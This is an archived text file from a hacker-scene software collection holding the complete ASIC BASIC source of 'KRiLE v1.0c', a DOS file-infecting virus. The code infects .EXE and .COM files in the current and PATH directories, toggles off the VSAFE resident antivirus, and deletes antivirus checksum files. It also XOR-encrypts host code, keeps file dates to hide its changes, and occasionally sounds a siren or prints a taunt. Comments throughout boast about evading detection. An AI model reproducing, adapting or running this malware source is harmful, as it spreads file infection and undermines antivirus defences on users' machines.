Collection of Hack-Phreak Scene Programs

home *** CD-ROM | disk | FTP | other *** search

/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / CASIOCOL.ZIP / KRILE1C.ZIP / SOURCE.ZIP / KRILE.ASI < prev next >

Wrap

Text File | 1997-12-05 | 12KB | 580 lines

rem KRiLE v1.0c written by RAiD for [SLAM] rem An experimental virus, Which *should* get around tbfile and nav rem if they happen to be resident. dim virus_data(2940) dim host_data(2940) call sub"Criterror!" randomize virus_size=5880 virus_size&=5880& virus_sig$="1234" exe$="*.exe" com$="*.com" killfil1$="anti-vir.dat" killfil2$="chklist.ms" killfil3$="chklist.cps" krsig1$="■KRiLE■ v1.0c - When will u learn AV? (c) by RAiD UsA [SLAM]97" notouch$="Command|staRt|emm386|mscdex|explorer|mouse|smartdrv|setver|dos4gw" vsafe_stats=0 gosub vsafe_toggle: vsafe_stats=cx call sub "exename" hostname$ yourparm$=command$ yourparm$=ltrim$(yourparm$) yourparm$=rtrim$(yourparm$) yourparm$=" "+yourparm$ gosub chksum_die: filename$=hostname$ hostsize&=filelen(filename$) gosub get_attr: oldattr=newattr newattr=0 gosub set_attr: gosub open_file: bytesize=virus_size dx=varptr(virus_data(0)) gosub read_file: gosub close_file: newattr=oldattr gosub set_attr: rem Ok, we have an image loaded, let's scan the current directory rem for use-able hosts. We also deal with any checksum files during rem this scan. gosub cur_dir: rem Now, were going to find out just how many paths there are gosub path_search: rem We are now ready to proceed path infection, after we make one rem safety check. (this prevents Division By zero errors) rem Before setting, Ensure loc does *not* equal 0. If by some sad-chance rem it does, We do *not* even attempt path infection! target=1 range=loc if range=0 then virupath$="" goto done: endif gosub rand_num: total=a rem If we made it this far, We have determined how many paths rem There actually are. and how many we will infect. Now, let's rem decide which ones of that total are to be infected. exit=0 tally=-1 while exit=0 tally=tally+1 range=loc gosub rand_num: n=a gosub path_infect: if tally=total then exit=1 endif wend done: target=0 rem We're almost finished. Prepare the host for control passing. filename$=hostname$ gosub hide_host: hostsize&=filelen(filename$) gosub get_attr: oldattr=newattr newattr=0 gosub set_attr: gosub open_file: gosub get_fdt: hosttemp&=hostsize&-virus_size& move_way&=hosttemp& gosub move_file_pointer: bytesize=virus_size dx=varptr(host_data(0)) gosub read_file: move_way&=0& gosub move_file_pointer: gosub cypher_host: dx=varptr(host_data(0)) bytesize=virus_size gosub write_file: gosub set_fdt: gosub close_file: gosub strip_garbage: newattr=oldattr gosub set_attr: gosub res_host: rem Ok, siren anyone? rem a value of 256 ensures the siren is rare, which means this rem virus won't be detected right off the bat. No sense calling rem attention to ourselves too soon. :) range=256 gosub rand_num: if a=19 then gosub siren: endif call hostname$, yourparm$ r=vsafe_stats vsafe_stats=0 gosub vsafe_toggle: vsafe_stats=r filename$=hostname$ rem Let's make sure we don't accidently infect the host a second rem time. Happens rarely, but a good safety precaution anyways. rem Besides, doesn't eat much more code space. gosub infect_check: if infected=0 then gosub lets_infect: endif rem Check the current directory again, Host might have created rem some new targets. pkunzip.exe being a good example. Note: This rem allows my virus to resemble TSR based viruses somewhat. <G> gosub cur_dir: gosub vsafe_toggle: rem The range was already set at 256, we'll leave it rem as it is. and get us a number :) range=256 gosub rand_num: if a=19 then gosub say_hi: endif rem The end has been reached, return to operating system or calling rem program. end start_virus: errcode=0 attr=6 kewl=0 rem Setup rand-generator range to 4, and decide how many files rem were going to infect for this run :) range=2 gosub rand_num: virii=a rem Ok, decision made, let's infect! CALL SUB "FindFirstF" proc$ Attr ErrCode WHILE ErrCode = 0 CALL SUB "GetNameF" FileName$ filename$=virupath$+filename$ gosub infect_check: if infected=0 then gosub lets_infect: endif CALL SUB "FindNextF" ErrCode if kewl=virii then errcode=1 endif WEND return Lets_infect: rem Lets put our virus into the file shall we? :) gosub hide_host: hostsize&=filelen(filename$) gosub get_attr: oldattr=newattr newattr=0 gosub set_attr: gosub open_file: gosub get_fdt: bytesize=virus_size dx=varptr(host_data(0)) gosub read_file: move_way&=0& gosub move_file_pointer: bytesize=virus_size dx=varptr(virus_data(0)) gosub write_file: move_way&=hostsize& gosub move_file_pointer: gosub cypher_host: dx=varptr(host_data(0)) bytesize=virus_size gosub write_file: gosub set_fdt: kewl=kewl+1 gosub close_file: newattr=oldattr gosub set_attr: gosub res_host: return rem miscallenous file i/o routines beyond this point. Boring to look rem at.:) get_attr: AX = &HEX4300 DX = VARPTR(Filename$) CX = NewAttr INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA) return set_attr: AX = &HEX4301 DX = VARPTR(Filename$) CX = NewAttr INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA) return vsafe_toggle: ax=&hexfa02 dx=&hex5945 bx=vsafe_stats int86(&hex16,ax,bx,cx,dx,na,na,na,na,na) return get_fdt: if file_handle>4 then AX=&HEX5700 BX=FILE_HANDLE INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA) NEWDATE=CX NEWTIME=DX endif RETURN set_fdt: if file_handle>4 then AX=&HEX5701 BX=FILE_HANDLE CX=NEWDATE DX=NEWTIME INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA) endif RETURN rem DOS int file i/o driven code beyond this point :) rem ax=&hex3d00 rem ax opens file for read in this mode :-) rem ax=&hex3d01 rem ax opens file for write in this mode :-) rem ax=&hex3d02 rem ax opens file for read/write access :) hehehe open_file: AX=&HEX3D02 DX = VARPTR(Filename$) INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA) file_handle=ax return write_file: rem this routine will write selected bytes at whatever current position rem from whatever buffer i choose into the file. rem if the routine did not write all data ax will not equal cx upon rem return from int call. rem define dx register before calling this routine to point to the rem memory address of the buffer area you want to write from. like so: rem dx=varptr(buffer(0)) rem cx is how many bytes to write :) if file_handle>4 then ax=&hex4000 bx=file_handle cx=bytesize int86(&hex21,ax,bx,cx,dx,na,na,na,na,na) byteswritten=ax endif return read_file: rem as the name implies, it reads bytes into a buffer. :-) rem as with write_file, you need to predefine the dx register for the rem buffer where you want the info stored. Like so: dx=varptr(buffer(0)) rem if you don't, this routine will not work, or will overwrite some rem other section of memory. And for virus coding, this is very bad! :) rem cx register is how many bytes to read :) if file_handle>4 then ax=&hex3f00 bx=file_handle cx=bytesize int86(&hex21,ax,bx,cx,dx,na,na,na,na,na) bytesread=ax endif return close_file: rem This routine will close the selected file. rem do not try to close handle 2, very nasty... :-( if file_handle>4 then ax=&hex3e00 bx=file_handle int86(&hex21,ax,bx,na,na,na,na,na,na,na) endif return move_file_pointer: rem Moves file pointer from start of file to whereever I wanna go rem Routine called is patched(hacked) from asilib.lib method=0 call sub "fseek" file_handle, move_way&, method, errcode return cypher_host: y=varptr(host_data(0)) z=y+virus_size for x=y to z a=peek(x) ax=a bx=x rem Shrug, asic has no built in XOR routine, so we rem chat with the CPU ourselves to XOR it :) SETREGS (AX,BX,NA,NA,NA,NA,NA,NA,NA) CODE &HEX31, &HEXD8 GETREGS (AX,NA,NA,NA,NA,NA,NA,NA,NA) rem ENd of cpu-xor chat poke x,ax next x return infect_check: rem routine checks for files to avoid, size validation and to make rem sure the file is not already infected. If any of the routines rem return infected=1 then the rest of the file i/o does not rem occur (saves a few miliseconds i/o time) infected=0 gosub do_not_touch: if infected=0 then gosub size_check: endif if infected=0 then gosub prev_check: endif return prev_check: rem Is this file already infected? gosub get_attr: newattr=oldattr newattr=0 gosub set_attr: sig$=" " gosub open_file: move_way&=28 gosub move_file_pointer: dx=varptr(sig$) bytesize=4 gosub read_file: gosub close_file: newattr=oldattr gosub set_attr: if sig$=virus_sig$ then infected=1 endif if file_handle<5 then rem We couldn't open the damn file to check, assume it is indeed rem infected. and let's not fool with it. :) infected=1 endif return strip_garbage: rem This routine quickly scrapes off the appended data rem we wrote during the infection process gosub open_file: move_way&=hosttemp& gosub move_file_pointer: dx=0 bytesize=0 gosub write_file: gosub set_fdt: gosub close_file: return do_not_touch: rem Make sure the following files are NOT infected or rem otherwise tampered with. This routine actually rem seperates the filename from its path and extension rem then proceeds to compare it. a$=filename$ b=len(a$) b=b-4 b$=left$(a$,b) b=len(b$) d=varptr(b$) c=d+b e=-1 exit=0 while exit=0 a=peek(c) e$=chr$(a) if e$="\" then exit=1 else e=e+1 c=c-1 endif wend file_name$=right$(b$,e) file_name$=ucase$(file_name$) notouch$=ucase$(notouch$) b=instr(notouch$,file_name$) if b>0 then infected=1 endif return size_check: rem make sure the target file is larger then our virus rem if it's not, we must not bother to infect it. a&=filelen(filename$) if a&<virus_size& then rem file is too small infected=1 endif return chksum_die: rem this kills chksum type files with a few simple calls rem setting toast to killfil1$ 2 and 3 respectively rem also cuts down on virus size. ar$=filename$ rem above code stores original filename toast$=killfil1$ gosub waste: toast$=killfil2$ gosub waste: toast$=killfil3$ gosub waste: filename$=ar$ return say_hi: rem say our greeting and return to calling routine. print krsig1$ RETURN siren: rem muahahaha, Siren sounds :-) siren=1 gosub siren_out: siren=0 gosub siren_out: siren=1 gosub siren_out: siren=0 gosub siren_out: return siren_out: rem if were to go up, set siren=1 else rem set siren=0 to go down :) for x=1 to 2000 if siren=1 then z=x else z=2000 z=z-x endif sound z,1 next x return cur_dir: rem routine searches for and infects files in current directory rem this routine is used 2 times, so I just decided to make it a rem subroutine to save bytes. virupath$="" gosub chksum_die: proc$=exe$ gosub start_virus: proc$=com$ gosub start_virus: return waste: rem routine called by chksum_die rem removes all attributes and deletes requested file. filename$=virupath$ filename$=filename$+toast$ newattr=0 gosub set_attr: kill filename$ return rand_num: rem gets us a random number, of the selected range rem settable with the 'range' value. Saves bytes by only rem coding this part once and calling it on occasion for various rem fun things. Muahahaha a=rnd(0) a=a mod range if target=0 then a=a+1 endif return path_search: rem This routine tallys total paths defined rem for later random processing. exit=0 loc=0 while exit=0 call sub "path",loc,virupath$ if virupath$="" then exit=1 else loc=loc+1 endif wend return path_infect: rem routine proceeds to infect selected path given via the 'n' variable rem Notice, another safety check. This routine will abort if the rem selected path does not exist. call sub "path", n, virupath$ i=LEN(virupath$) if i>0 then b$=right$(virupath$,1) if b$<>"\" then virupath$=virupath$+"\" endif rem Before we infect, trash checksum files gosub chksum_die: proc$=virupath$+exe$ gosub start_virus: proc$=virupath$+com$ gosub start_virus: endif return hide_host: rem host_hide module oldname$=filename$ b=varptr(filename$) c=len(filename$) d=b+c b=d-3 d=d-1 for x=b to d e=rnd(0) e=e mod 36 e=e+140 poke x,e next x rem Now the filename has been changed, Lets rename it real quick :) name oldname$ as filename$ return res_host: name filename$ as oldname$ return